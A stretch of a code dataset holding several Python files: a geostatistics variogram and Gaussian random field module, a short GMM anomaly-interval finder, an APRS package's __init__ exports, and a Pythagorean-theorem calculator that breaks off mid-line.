\n By default it uses the Minkowski distance of order 2.\n Parameters :\n p : the Minkowski distance exponent (fixed to 2 here)\n \"\"\"\n data = geopandas_dataset\n coords = list(zip(data.centroid.x,data.centroid.y))\n dM = sp.distance_matrix(coords,coords,p=2.0)\n return dM\n \ndef _getDistResponseVariable(geopandas_dataset,response_variable_name):\n \"\"\" \n Returns the \"self/auto\" distance matrix of a response variable Y \n By default it uses the Minkowski distance of order 2.\n meaning:\n $$ v_{i,j} = (y_i - y_j)^2 $$\n Parameters :\n geopandas_dataset : (geopandas) the geopandas dataframe.\n response_variable_name : (string) name of the variable for calculating the distance.\n p : the Minkowski distance exponent (fixed to 2 here)\n \"\"\"\n data = geopandas_dataset\n y = data[response_variable_name].astype('float')\n yy = y.values.reshape(-1,1)\n dY = sp.distance_matrix(yy,yy,p=2.0)**2 # square to obtain (y_i - y_j)**2, matching the semivariogram definition\n return dY\n \n\n\n\n## These functions are for defining an empirical variogram\ndef calculateEmpiricalVariogram(distances,response_variable,n_bins=50,distance_threshold=False):\n \"\"\"\n Returns the empirical variogram given by the formula\n $$ v_{lag_i} = \\frac{1}{2 N(lag_i)} \\sum_{(i,j) \\in lag_i} (y_i - y_j)^2 $$ \n Parameters:\n n_bins : (Integer) number of bins (lag distances) \n \"\"\"\n mdist = min(distances)\n if distance_threshold :\n Mdist = distance_threshold * (1.0/10.0 + 1)\n else:\n Mdist = max(distances)\n \n partitions = np.linspace(mdist,Mdist,n_bins)\n lags = partitions[:n_bins - 1]\n y = response_variable\n d = pd.DataFrame({'dist': distances,'y':y})\n \n if distance_threshold:\n d = d[ d['dist'] < distance_threshold ]\n # The actual emp. var function \n #import ipdb; ipdb.set_trace()\n empvar = map(lambda ix : 0.5 * (d[ ( d.dist < partitions[ix[0]+1]) & (d.dist>partitions[ix[0]])].y.mean()),enumerate(lags))\n ## Get number of elements here\n n_points = map(lambda ix : d[ ( d.dist < partitions[ix[0]+1]) & (d.dist>partitions[ix[0]])].shape[0],enumerate(lags))\n \n \n \n #self.empirical = empvar\n content = {'lags':lags,'variogram':list(empvar),'n_points' : list(n_points)}\n results = pd.DataFrame(content)\n \n return results\n \n\ndef montecarloEnvelope(distances,response_variable,num_iterations=99,n_bins=50,distance_threshold=False):\n \"\"\"\n Generate Monte Carlo envelope by shuffling the response variable and keeping the distances the same.\n After GeoR. 
(\"Model-Based Geostatistics; Diggle and Ribeiro, 2007\")\n Parameters :\n distances (List) linearised format of a distance matrix\n response_variable (list) linearised format of a response distance matrix.\n \"\"\"\n simulation_variograms = []\n d = calculateEmpiricalVariogram(distances,response_variable,n_bins=n_bins,distance_threshold=distance_threshold)\n for i in range(num_iterations):\n #np.random.shuffle(response_variable)\n d = calculateEmpiricalVariogram(distances,response_variable,n_bins=n_bins,distance_threshold=distance_threshold)\n simulation_variograms.append(d.variogram)\n np.random.shuffle(response_variable)\n\n #simulation_variograms.append(d.lags)\n #sims = pd.DataFrame(simulation_variograms).transpose()\n sims = pd.DataFrame(simulation_variograms)\n ## Drop any possible Nan, incompatible with quantile\n sims = sims.dropna(axis=1)\n #sims.set_index('lags')\n \n low_q = sims.quantile(0.025)\n high_q = sims.quantile(0.975)\n envelope = pd.DataFrame({'envlow':low_q,'envhigh':high_q,'lags':d.lags})\n return (envelope,sims)\n #return envelope \n\nclass Variogram(object):\n \"\"\"\n A class that defines Empirical Variogram objects.\n \"\"\"\n def __init__(self,geopandas_dataset,response_variable_name,model='',using_distance_threshold=False):\n \"\"\"\n Constructor\n Parameters :\n geopandas_dataset : (geopandas) the geopandas dataframe.\n response_variable_name : (string) name of the variable for calculating the distance.\n p : the Minkowski distance exponent (order)\n distance_threshold : same units as coordinates\n \"\"\"\n self.data = geopandas_dataset\n self.selected_response_variable = response_variable_name\n self.empirical = pd.Series()\n self.lags = []\n self.envelope = pd.DataFrame()\n self.distance_threshold = using_distance_threshold\n self.n_points = []\n self.model = model\n \n @property\n def distance_coordinates(self): \n return _getDistanceMatrix(self.data)\n @property\n def distance_responses(self):\n return _getDistResponseVariable(self.data,self.selected_response_variable)\n\n \n def calculateEmpirical(self,n_bins=50):\n \"\"\"\n Returns the empirical variogram given by the formula:\n $$ v_{lag_i} = \\frac{\\sum_{i=1}^{N(lag_i)} (y_i - y_j)^2}{2} $$\n \n Parameters:\n n_bins : (Integer) number of bins (lag distances) \n \n This only assigns the data to the corresponding attributes.\n \n \"\"\"\n \n distances = self.distance_coordinates.flatten()\n y = self.distance_responses.flatten()\n results = calculateEmpiricalVariogram(distances,y,n_bins=n_bins,distance_threshold=self.distance_threshold)\n\n self.lags = results.lags\n self.empirical = results.variogram\n self.n_points = results.n_points\n return self.empirical\n \n def calculateEnvelope(self,num_iterations=99,n_bins=50):\n \"\"\"\n Calculates the Montecarlo variogram envelope.\n \"\"\"\n logger.info(\"Calculating envelope via MonteCarlo Simulations. 
\\n Using %s iterations\"%num_iterations)\n distances = self.distance_coordinates.flatten()\n responses = self.distance_responses.flatten()\n envelopedf,sims = montecarloEnvelope(distances,responses,num_iterations=num_iterations,n_bins=n_bins,distance_threshold=self.distance_threshold)\n envelopedf = pd.concat([envelopedf,self.empirical],axis=1)\n self.envelope = envelopedf\n return envelopedf\n \n def plot(self,with_envelope=False,percentage_trunked=10,refresh=True,n_bins=50,plot_filename=False,**kwargs):\n \"\"\"\n Plot the empirical semivariogram with optional confidence interval using MonteCarlo permutations at 0.025 and 0.975 quantiles.\n Returns a matplotlib object.\n Parameters : \n with_envelope : (Boolean) if true it will calculate and plot the 0.025 and 0.975 quantiles of a montecarlo permutations of $Y$ using fixed locations.\n percentage_trunked = (float) Percentage of data removed in the plot. This is to ease the visualisation by cutting the last values\n \n Extra parameters in the kwargs\n * num_iterations : (Integer) see CalculateEnvelope\n * n_bins : (Integer) see calculate_variogram \n \n \"\"\"\n \n \n\n if (self.empirical.empty or refresh == True):\n logger.info(\"Calculating empirical variogram\")\n self.calculateEmpirical(n_bins=n_bins)\n try :\n self.envelope.variogram = self.empirical\n except:\n logger.info(\"Envelope attribute not found. Storing variogram in empirical attribute\")\n \n nrows = self.empirical.shape[0]\n indx = int(np.ceil(float(percentage_trunked)/100 * nrows))\n \n lags = self.lags.iloc[: (nrows - indx)]\n empirical = self.empirical.iloc[:(nrows - indx)]\n \n \n if with_envelope:\n if ( self.envelope.empty or refresh == True) :\n logger.info(\"No envelope object found. Calculating...\")\n num_iter = kwargs.get('num_iterations')\n if isinstance(num_iter, int):\n self.calculateEnvelope(num_iterations=num_iter,n_bins=n_bins)\n else:\n self.calculateEnvelope()\n else:\n logger.info(\"Using previously stored envelope. Use refresh option to recalculate.\") \n \n envelope = self.envelope.iloc[:(nrows - indx)]\n \n plt.plot(lags,envelope.envhigh,'k--')\n plt.plot(lags,envelope.envlow,'k--')\n plt.fill_between(lags,envelope.envlow,envelope.envhigh,alpha=0.5)\n plt.legend(labels=['97.5%','emp. varig','2.5%'])\n \n \n ## ********* PLOT \n plt.plot(lags,empirical,'o--',lw=2.0) \n ## ****** PLOT\n plt.legend(loc='best')\n plt.xlabel(\"Distance in meters\")\n plt.ylabel(\"Semivariance\")\n #plt.legend(labels=['97.5%','emp. varig','2.5%'])\n #ax = \n #points2 = plt.lines(vg.lags,vg.empirical,c='red')\n #plt.show()\n logger.debug(\"Check which object to return. 
maybe a figure\")\n \n\n \n \n if plot_filename :\n plt.savefig(plot_filename)\n \n return None \n \n\n\n## This function is useful for calculating the empirical variogram using the chunk method\n## Attention: this method does not implements a neighbouring pointa (out of the edge effect)\n\n def fitVariogramModel(self,model_instance,parameter_set=[]):\n \"\"\"\n Fits a valid model (tools.models) to the empirical variogram object as base.\n \n Parameters:\n model_class : the class of a valid model.\n parameter_set : a tuple containing the init guesses for the parameters to be fitted from the model\n \n Returns:\n A function with the optimized parameters.\n \"\"\"\n if parameter_set:\n parameter_dict = model_instance.fit(self,parameter_set)\n else:\n parameter_dict = model_instance.fit(self)\n \n \n logger.info(\"Added fitted model to attributes\")\n self.model = model_instance\n return self.model\n \n def fitTheoreticalVariogramModel(self,model,parameter_set):\n \"\"\"\n Fits a valid model (tools.model) to the empirical variogram object as base.\n \n Parameters:\n model : a Valid model (function)\n parameter_set : a tuple containing the init guesses for the parameters to be fitted from the model\n \n Returns:\n A function with the optimized parameters.\n \n notes::\n Deprecated. Use: fitVariogramModel\n \"\"\"\n \n logger.warn(\"Deprecated. Use: fitVariogramModel\")\n logger.info(\"Removing possible NA's\")\n self.envelope = self.envelope.dropna()\n variogram = self.envelope.variogram.values\n lags = self.envelope.lags.values\n from scipy.optimize import curve_fit\n #try:\n best_params, covar_model = curve_fit(model, xdata=lags, ydata=variogram, p0=parameter_set)\n #except:\n # logger.error(\"Model selected doesn´t support more than 3 parametes\")\n \n teovarmodel = theoreticalVariogram(model,*best_params)\n logger.info(\"Adding model to the attributes space\")\n setattr(self,'model',model)\n setattr(self,'model_params',best_params)\n setattr(self,'model_covar',covar_model)\n \n return (teovarmodel,{'parameters':best_params,'covar_model':covar_model})\n\n def calculateCovarianceMatrix(self):\n \"\"\"\n Returns an evaluation of the Covariance matrix, given the model stored as attribute.\n \"\"\"\n MMdist = self.distance_coordinates\n Sigma = self.model.calculateCovarianceMatrixWith(MMdist)\n return Sigma\n\n\n\n\ndef PartitionDataSet(geodataset,namecolumnx,namecolumny,n_chunks=10,minimmum_number_of_points=10):\n \"\"\"\n Divides the given geodataset into n*n number of chunks\n Parameters : \n geodataset (GeoDataset) with defined coordinates (geometric column)\n n_chunks : (int) desired number of chunks per dimension (resulting nxn chunks)\n minimmum_number_of_points : (int) the minimum number of points for accepting a chunk as valid.\n \"\"\"\n data = geodataset\n minx,maxx,miny,maxy = _getExtent(data)\n N = n_chunks\n xp,dx = np.linspace(minx,maxx,N,retstep=True)\n yp,dy = np.linspace(miny,maxy,N,retstep=True)\n xx,yy = np.meshgrid(xp,yp)\n coordinates_list = [ (xx[i][j],yy[i][j]) for i in range(N) for j in range(N)]\n from functools import partial\n tuples = map(lambda x,y : partial(_getExtentFromPoint,x,y,step_sizex=dx,step_sizey=dy)(),coordinates_list)\n chunks = map(lambda mx,Mx,my,My : _subselectDataFrameByCoordinates(data,namecolumnx,namecolumny,mx,Mx,my,My),tuples)\n ## Here we can filter based on a threshold\n threshold = minimmum_number_of_points\n chunks_non_empty = filter(lambda df : df.shape[0] > threshold ,chunks)\n return chunks_non_empty\n \n\ndef createGrid(minx=0.0, maxx = 
1.0,miny=0.0,maxy=1.0,grid_sizex=50,grid_sizey=50):\n \"\"\"\n Create a Square Grid with custom coordinates and size.\n Parameters :\n minx : (Float) where to start point 0\n maxx : (Float) where to finish grid \n grid_sizex, grid_sizey : (Int) number of points per side.\n \"\"\"\n nx = np.linspace(minx,maxx,grid_sizex)\n ny = np.linspace(miny,maxy,grid_sizey)\n xx, yy = np.meshgrid(nx,ny)\n points = pd.DataFrame({'Lon': xx.ravel(),'Lat':yy.ravel()})\n points = toGeoDataFrame(points,'Lon','Lat')\n return points\n\n\n\ndef simulateGaussianRandomField(variogram_model,grid,random_seed=False,return_matrix=True):\n \"\"\"\n Returns a Random simulation of the derived Multivariate Normal Distribution with $\\mu$ response variable and $\\Sigma$ = resulting covariance matrix from the model.\n Parameters : \n variogram Model (Variogram) : an instance from variogram\n grid (Dataframe) : a geodata frame with coordinates.\n random_seed : (Integer) a random seed to reproduce results.\n \n return_matrix : (Bool) if true it will return a square matrix.\n note: For this case the grid must be SQUARE. \n \n note: to create the grid see: createGrid\n \n \"\"\"\n n_sq = len(grid)\n Y = np.zeros(n_sq)\n grid['Y'] = Y\n vg = Variogram(grid,'Y',model=variogram_model)\n logger.info(\"Calculating Sigma (CovMat)\")\n Sigma = vg.calculateCovarianceMatrix()\n from scipy.stats import multivariate_normal as mvn\n if random_seed:\n np.random.seed(random_seed)\n sim1 = mvn.rvs(mean=Y,cov=Sigma) \n if return_matrix:\n n = int(np.sqrt(n_sq))\n return sim1.reshape(n,n)\n else:\n s = pd.DataFrame({'sim':sim1})\n return s\n\ndef simulatedGaussianFieldAsPcolorMesh(variogram_model,minx=0.0, maxx = 1.0,miny=0.0,maxy=1.0,grid_sizex=50,grid_sizey=50,random_seed=False):\n \"\"\"\n A wrapper that creates a grid and performs a simulated Gaussian process\n It returns a triplet to plot directly using matplotlib.pcolor or pcolormesh.\n \n note: It uses the functions: `createGrid` and `simulateGaussianRandomField`\n \"\"\"\n grid1 = createGrid(minx, maxx, miny, maxy, grid_sizex, grid_sizey)\n sim = simulateGaussianRandomField(variogram_model,grid1,random_seed=random_seed,return_matrix=False)\n del(grid1)\n nx = np.linspace(minx,maxx,grid_sizex)\n ny = np.linspace(miny,maxy,grid_sizey)\n xx, yy = np.meshgrid(nx,ny)\n sim = sim.sim.values.reshape(grid_sizey,grid_sizex)\n return (xx,yy,sim)\n\n### Theoretical Models\ndef gaussianVariogram(h,sill=0,range_a=0,nugget=0):\n \"\"\"\n The Gaussian variogram. It is only positive SEMI-definite, so its use is not recommended.\n \n $$\\gamma (h)=(s-n)\\left(1-\\exp \\left(-{\\frac {h^{2}}{r^{2}a}}\\right)\\right)+n1_{{(0,\\infty )}}(h)$$\n \n Parameters:\n h : (Float or Numpy Array) Distances to evaluate\n sill : Float\n range_a : Float\n nugget : Float \n \n \"\"\"\n if isinstance(h,np.ndarray):\n #Ih = np.array([1.0 if hx >= 0.0 else 0.0 for hx in h])\n Ih = np.copy(h)\n Ih[Ih >= 0.0 ] = 1.0\n Ih[Ih < 0.0] = 0.0\n else:\n Ih = 1.0 if h >= 0 else 0.0\n #Ih = 1.0 if h >= 0 else 0.0 \n g_h = ((sill - nugget)*(1 - np.exp(-(h**2 / range_a**2)))) + nugget*Ih\n return g_h\n\ndef exponentialVariogram(h,sill=0,range_a=0,nugget=0):\n \"\"\"\n The exponential variogram model\n \n $$\\gamma (h)=(s-n)(1-\\exp(-h/(ra)))+n1_{{(0,\\infty )}}(h)$$\n \n Parameters:\n h : (Float or Numpy Array) Distances to evaluate\n sill : Float\n range_a : Float\n nugget : Float \n \n \"\"\"\n \n if isinstance(h,np.ndarray):\n #Ih = np.array([1.0 if hx >= 0.0 else 0.0 for hx in h])\n Ih = np.copy(h)\n Ih[Ih >= 0.0 ] = 1.0\n Ih[Ih < 0.0] = 0.0\n 
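# scalar h: the (0, inf) indicator reduces to a single 0/1 value\n 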
else:\n Ih = 1.0 if h >= 0 else 0.0\n g_h = (sill - nugget)*(1 - np.exp(-h/range_a)) + (nugget*Ih)\n return g_h\n\ndef sphericalVariogram(h,sill=0,range_a=0,nugget=0):\n \"\"\"\n The spherical variogram \n \n $$\\gamma (h)=(s-n)\\left(\\left({\\frac {3h}{2r}}-{\\frac {h^{3}}{2r^{3}}}\\right)1_{{(0,r)}}(h)+1_{{[r,\\infty )}}(h)\\right)+n1_{{(0,\\infty )}}(h)$$\n\n Parameters:\n h : (Float or Numpy Array) Distances to evaluate\n sill : Float\n range_a : Float\n nugget : Float \n\n \"\"\"\n \n if isinstance(h,np.ndarray):\n #Ih = np.array([1.0 if hx >= 0.0 else 0.0 for hx in h])\n Ih = np.copy(h)\n Ih[Ih >= 0.0 ] = 1.0\n Ih[Ih < 0.0] = 0.0\n I0r = np.array([1.0 if hi <= range_a else 0.0 for hi in h])\n Irinf = [1.0 if hi > range_a else 0.0 for hi in h]\n else:\n Ih = 1.0 if h >= 0 else 0.0\n # h is scalar here; the interval indicators are plain 0/1 floats\n I0r = 1.0 if h <= range_a else 0.0\n Irinf = 1.0 if h > range_a else 0.0\n g_h = (sill - nugget)*(((3*h / float(2*range_a)) - (h**3 / float(2*range_a**3)))*I0r + Irinf) + (nugget*Ih)\n return g_h\n\n\n\n#def MaternVariogram(h,range_a,nugget=40,sill=100,kappa=0.5):\ndef maternVariogram(h,sill=1,range_a=100,nugget=40,kappa=0.5): \n \"\"\"\n The Matern Variogram of order $\\kappa$.\n \n $$ \\gamma(h) = sill\\left(1 - \\frac{1}{2^{\\kappa -1}\\Gamma(\\kappa)} \\left(\\frac{h}{r}\\right)^{\\kappa} K_{\\kappa}\\Big(\\frac{h}{r}\\Big)\\right)$$\n \n (nugget is accepted for interface compatibility but unused here.)\n Let:\n a = $(2^{\\kappa -1} \\Gamma(\\kappa))^{-1}$ \n b = $\\frac{h}{r}$\n K_v = Modified Bessel function of the second kind of real order v\n \"\"\"\n \n #a = np.power(2, 1 - kappa) / special.gamma(kappa)\n #b = (np.sqrt(2 * kappa) / range_a) * h\n a = 1 / (np.power(2,kappa - 1 ) * special.gamma(kappa))\n \n b = (h / float(range_a))\n #Modified bessel function of second kind order kappa evaluated at b\n K_v_b = special.kv(kappa,b)\n \n rho_h = a * np.power(b,kappa) * K_v_b\n \n kh = sill * (1 - rho_h)\n \n ##legacy\n ##kh = sigma * a * np.power(b,kappa) * K_v\n ##kh = (sill - nugget) * ( 1 - (a * np.power(b,kappa) * K_v))\n #kh = nugget + (sill * ( 1 - (a * np.power(b,kappa) * K_v)))\n ## end legacy\n kh = np.nan_to_num(kh)\n\n return kh \n\ndef whittleVariogram(h,sill=0,range_a=0,nugget=0,alpha=1):\n \"\"\"\n The Whittle Variogram, an alternative to the Gaussian Model.\n $$\\gamma (h)=(s-n)\\left(1-\\exp \\left(-{\\frac {h^{\\alpha}}{r^{\\alpha}}}\\right)\\right)+n1_{{(0,\\infty )}}(h)$$\n\n $$\\gamma (h)=\\sigma^2\\left(1-\\exp \\left(-{\\frac {h^{\\alpha}}{r^{\\alpha}}}\\right)\\right)+n1_{{(0,\\infty )}}(h)$$\n \n\n \n Parameters:\n h : (Float or Numpy Array) Distances to evaluate\n sill : Float\n range_a : Float\n nugget : Float \n \n \"\"\"\n if isinstance(h,np.ndarray):\n #Ih = np.array([1.0 if hx >= 0.0 else 0.0 for hx in h])\n Ih = np.copy(h)\n Ih[Ih >= 0.0 ] = 1.0\n Ih[Ih < 0.0] = 0.0\n else:\n Ih = 1.0 if h >= 0 else 0.0\n #Ih = 1.0 if h >= 0 else 0.0 \n g_h = ((sill - nugget)*(1 - np.exp(-(h**alpha / range_a**alpha)))) + nugget*Ih\n return g_h\n\ndef theoreticalVariogram(model_function,sill,range_a,nugget,alpha=0):\n if alpha == 0:\n return lambda x : model_function(x,sill,range_a,nugget)\n else: \n return lambda x : model_function(x,sill,range_a,nugget,alpha)\n\nclass VariogramModel(object):\n \"\"\"\n This class specifies several variogram models.\n \"\"\"\n def __init__(self,sill=0,range_a=0,nugget=0):\n \"\"\"\n Constructor:\n optional parameters for defining the model.\n \"\"\"\n self.sill = sill\n self.range_a = range_a\n self.nugget = nugget\n self.model = []\n \n def __repr__(self):\n return \"< An abstract Variogram Model>\"\n\n 
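# Convenience callable: binds the current sill/range_a/nugget into self.model.\n 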
@property\n def f(self):\n return lambda x : self.model(x,self.sill,self.range_a,self.nugget)\n \n\n def corr_f(self,h):\n \"\"\"\n Calculates the correlation function based on the given theoretical \"intrinsically valid model\"\n \n \"\"\"\n ## correlation function for distances bigger than zero\n ## See: Diggle & Ribeiro (2006) section 3.5\n #corr_cont = lambda hx : 1 - (self.sill * self.f(hx) / (self.sill + self.nugget))\n ## Corrections made and suggested by Erick Chacon\n variogram_evaluated = self.f(h)\n corr_cont = (self.sill - variogram_evaluated) / (self.sill - self.nugget)\n #corr_cont = lambda hx : (self.sill - self.f(hx)) / (self.sill - self.nugget)\n #return np.array([1.0 if hx == 0 else corr_cont(hx) for hx in h])\n #corr_cont[corr_cont == 0 ] = 1.0 \n return corr_cont\n\n @property\n def sigma2(self):\n return (self.sill - self.nugget)\n\n @property\n def tau2(self):\n return self.nugget\n\n def calculateCovarianceMatrixWith(self,Mdist):\n \"\"\"\n Returns an evaluation of the Covariance matrix, given a distance matrix.\n Parameters : numpy Matrix\n \"\"\"\n nuggetId = self.nugget * np.identity(Mdist.shape[0])\n s2 = self.sill - self.nugget\n correlMat = np.array(self.corr_f(Mdist.flatten())).reshape(Mdist.shape)\n Sigma = (s2 * correlMat) + nuggetId\n return Sigma\n\n\n\n def fit(self,emp_variogram,init_params=[]):\n \"\"\"\n Fits the model to an empirical variogram object.\n \n Parameters:\n emp_variogram : (Variogram instance)\n init_params : a tuple containing the init guesses for the parameters to be fitted from the model\n \n Returns:\n A function with the optimized parameters\n \n \"\"\"\n logger.info(\"Removing possible NA's\")\n envelope = pd.DataFrame({'variogram':emp_variogram.empirical,'lags':emp_variogram.lags})\n envelope = envelope.dropna()\n variogram = envelope.variogram.values\n lags = envelope.lags.values\n from scipy.optimize import curve_fit\n if not init_params:\n init_params = [self.sill,self.range_a,self.nugget]\n if hasattr(self, 'alpha'):\n init_params.append(self.alpha)\n \n try:\n best_params, covar_model = curve_fit(self.model, xdata=lags, ydata=variogram, p0=init_params)\n except TypeError:\n logger.error(\"This model does not support more than 3 parameters\")\n raise\n #return None\n try:\n s,r,n = best_params\n self.sill = s\n self.range_a = r\n self.nugget = n\n except:\n try:\n s,r,n,a = best_params\n self.sill = s\n self.range_a = r\n self.nugget = n\n self.alpha = a\n except:\n raise\n \n logger.info(\"Adding model to the attributes space\")\n\n setattr(self,'model_covar',covar_model)\n \n return {'parameters':best_params,'covar_model':covar_model}\n\n \n## Instances of Variogram \nclass ExponentialVariogram(VariogramModel):\n \"\"\"\n Subclass for exponential Variogram\n \"\"\"\n def __init__(self,sill=0,range_a=0,nugget=0):\n super(ExponentialVariogram, self).__init__(sill,range_a,nugget)\n self.model = exponentialVariogram\n self.name = 'exponential'\n def __repr__(self):\n return u\"< Exponential Variogram : sill %s, range %s, nugget %s >\"%(self.sill,self.range_a,self.nugget)\n\nclass GaussianVariogram(VariogramModel):\n \"\"\"\n Subclass for Gaussian Variogram\n \"\"\"\n def __init__(self,sill=0,range_a=0,nugget=0):\n super(GaussianVariogram, self).__init__(sill,range_a,nugget)\n self.model = gaussianVariogram\n self.name = 'gaussian'\n def __repr__(self):\n return u\"< Gaussian Variogram : sill %s, range %s, nugget %s >\"%(self.sill,self.range_a,self.nugget)\n\nclass WhittleVariogram(VariogramModel):\n \"\"\"\n Subclass for 
Whittle Variogram\n \"\"\"\n def __init__(self,sill=0,range_a=0,nugget=0,alpha=1):\n super(WhittleVariogram, self).__init__(sill,range_a,nugget)\n self.model = whittleVariogram\n self.name = 'whittle'\n self.alpha = alpha\n def __repr__(self):\n return u\"< Whittle Variogram : sill %s, range %s, nugget %s, alpha %s >\"%(self.sill,self.range_a,self.nugget,self.alpha)\n\n @property\n def f(self):\n return lambda x : self.model(x,self.sill,self.range_a,self.nugget,self.alpha)\n\n\n\nclass SphericalVariogram(VariogramModel):\n \"\"\"\n Subclass for Spherical Variogram\n \"\"\"\n def __init__(self,sill=0,range_a=0,nugget=0):\n super(SphericalVariogram, self).__init__(sill,range_a,nugget)\n self.model = sphericalVariogram\n self.name = 'spherical'\n def __repr__(self):\n return u\"< Spherical Variogram : sill %s, range %s, nugget %s >\"%(self.sill,self.range_a,self.nugget)\n\n\nclass MaternVariogram(VariogramModel):\n \"\"\"\n Subclass for a Matern Variogram\n \"\"\" \n def __init__(self,sill=0,range_a=0,nugget=0,kappa=0.5):\n super(MaternVariogram, self).__init__(sill,range_a,nugget)\n self.kappa = kappa\n self.model = maternVariogram\n self.name = 'matern'\n def __repr__(self):\n return u\"< Matern Variogram : sill %s, range %s, nugget %s, kappa %s >\"%(self.sill,self.range_a,self.nugget,self.kappa)\n\n @property\n def f(self):\n return lambda x : self.model(x,self.sill,self.range_a,self.nugget,self.kappa)\n \nif __name__ == \"__main__\":\n __package__ = \"spystats\"\n \n\n\n\n\n \n","repo_name":"molgor/spystats","sub_path":"spystats/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":29197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31738485149","text":"import numpy as np\nimport scipy as sp\n\nfrom common import single_em, compute_responsibilities\n\n# find GMM subinterval: max sum subarray of length l\ndef find_subint(arr, l):\n n = len(arr)\n max_sum = -np.inf\n max_left_end = -1\n max_right_end = -1\n # include the window that ends at the last element\n for i in range(n - l + 1):\n s = np.sum(arr[i:i+l])\n if s > max_sum:\n max_sum = s\n max_left_end = i\n max_right_end = i + l - 1\n return max_left_end, max_right_end\n\n# returns anomalous indices\ndef find_line(sample):\n mu_est, alpha_est = single_em(sample)\n n = len(sample) # number of observations; alpha_est is the estimated anomaly fraction\n alpha_n_est = int(alpha_est*n)\n sample_resp = compute_responsibilities(sample, mu_est, alpha_est)\n le, re = find_subint(sample_resp, alpha_n_est)\n return range(le, re+1)","repo_name":"raphael-group/structured-anomalies","sub_path":"src/gmm_line.py","file_name":"gmm_line.py","file_ext":"py","file_size_in_byte":743,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"43635558910","text":"from importlib_metadata import version\n\nfrom . 
import decimaldegrees, geo_util, position, timestamp\nfrom .aprsis import APRSISProtocol, create_aprsis_connection, TCP\nfrom .classes import (\n APRSFrame,\n DataType,\n DataTypeError,\n InformationField,\n ItemReport,\n Message,\n ObjectReport,\n PositionReport,\n StatusReport,\n)\nfrom .constants import (\n APRSIS_HTTP_HEADERS,\n APRSIS_SERVERS,\n APRSIS_FILTER_PORT,\n APRSIS_RX_PORT,\n APRSIS_URL,\n DEFAULT_TOCALL,\n PositionFormat,\n TimestampFormat,\n timestamp_formats_map,\n)\nfrom .data_ext import (\n AreaObject,\n CourseSpeed,\n DataExt,\n DFS,\n PHG,\n RNG,\n)\nfrom .kiss import create_serial_connection, create_tcp_connection, SerialKISS, TCPKISS\nfrom .position import Position\nfrom .timestamp import Timestamp\n\n__author__ = \"Greg Albrecht W2GMD \"\n__copyright__ = \"Copyright 2017 Greg Albrecht and Contributors\"\n__license__ = \"Apache License, Version 2.0\"\n__distribution__ = \"aprs3\"\n__version__ = version(__distribution__)\n__all__ = [\n \"APRSFrame\",\n \"APRSIS_HTTP_HEADERS\",\n \"APRSIS_SERVERS\",\n \"APRSIS_FILTER_PORT\",\n \"APRSIS_RX_PORT\",\n \"APRSIS_URL\",\n \"APRSISProtocol\",\n \"AreaObject\",\n \"CourseSpeed\",\n \"create_aprsis_connection\",\n \"create_serial_connection\",\n \"create_tcp_connection\",\n \"DataExt\",\n \"DataType\",\n \"DataTypeError\",\n \"decimaldegrees\",\n \"DEFAULT_TOCALL\",\n \"DFS\",\n \"geo_util\",\n \"ItemReport\",\n \"InformationField\",\n \"Message\",\n \"ObjectReport\",\n \"PHG\",\n \"position\",\n \"Position\",\n \"PositionFormat\",\n \"PositionReport\",\n \"RNG\",\n \"SerialKISS\",\n \"StatusReport\",\n \"TCP\",\n \"TCPKISS\",\n \"timestamp\",\n \"Timestamp\",\n \"TimestampFormat\",\n \"timestamp_formats_map\",\n \"__author__\",\n \"__copyright__\",\n \"__license__\",\n \"__distribution__\",\n \"__version__\",\n]\n","repo_name":"python-aprs/aprs3","sub_path":"aprs/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"32018307020","text":"# =============================================================================\n# Undesirable solution 2\n#\n# Like the Undesirable 1 script, this has user inputs.\n# Also, right triangle sides a and b use the same equations.\n# If I wanted one function to calculate both side and hypotenuse,\n# I would have needed user input to determine which equation to use.\n# Since unit tests seem to be a better fit for parameter inputs, I refactored.\n# =============================================================================\n\n\ndef calc_pythagorean_theorem():\n \"\"\"Calculate the Pythagorean theorem\n Results are printed to console, and also passed back as a float type\"\"\"\n\n print(\"\\nCalculate triangle side lengths with the Pythagorean theorem\")\n \n \n while True:\n try:\n side = input(\"To solve for Hypotenuse, enter 'c'. Otherwise, choose 'a' or 'b': \")\n assert side in ['a', 'b', 'c']\n \n except AssertionError:\n print(\"Must choose 'a', 'b' or 'c'\")\n else:\n break \n\n\n if side == 'a':\n \n while True:\n try:\n b = float(input(\"Enter the length of side b: \"))\n except ValueError:\n print(\"Numeric only!\")\n continue\n break\n\n while True:\n try:\n c = float(input(\"Enter the length of hypotenuse c: \"))\n except ValueError:\n print(\"Numeric only!\")\n continue\n break \n\n a = ((c * c) - (b * b)) ** (1.0 / 2.0)\n\n if isinstance(a, complex):\n print(\"Your return is complex. 
Ensure values meet Pythagorean requirements\")\n        \n        print(\"\\nThe length of \" + side + \" is \" + str(complex(a)))\n        \n        return a\n    \n    elif side == 'b':  \n        while True:\n            try:\n                a = float(input(\"Enter the length of side a: \"))\n            except ValueError:\n                print(\"Numeric only!\")\n                continue\n            break\n\n        while True:\n            try:\n                c = float(input(\"Enter the length of hypotenuse c: \"))\n            except ValueError:\n                print(\"Numeric only!\")\n                continue\n            break  \n\n        b = ((c * c) - (a * a)) ** (1.0 / 2.0)\n\n        if isinstance(b, complex):\n            print(\"Your return is complex. Ensure values meet Pythagorean requirements\")\n\n        print(\"\\nThe length of \" + side + \" is \" + str(round(b, 3)))\n\n        return b\n    \n    elif side == 'c':\n        \n        while True:\n            try:\n                a = float(input(\"Enter the length of side a: \"))\n            except ValueError:\n                print(\"Numeric only!\")\n                continue\n            break\n\n        while True:\n            try:\n                b = float(input(\"Enter the length of side b: \"))\n            except ValueError:\n                print(\"Numeric only!\")\n                continue\n            break  \n\n        c = ((a * a) + (b * b)) ** (1.0 / 2.0)\n\n        if isinstance(c, complex):\n            print(\"Your return is complex. Ensure values meet Pythagorean requirements\")\n\n        print(\"\\nThe length of \" + side + \" is \" + str(round(c, 3)))\n        \n        return c\n\n    \nresult = 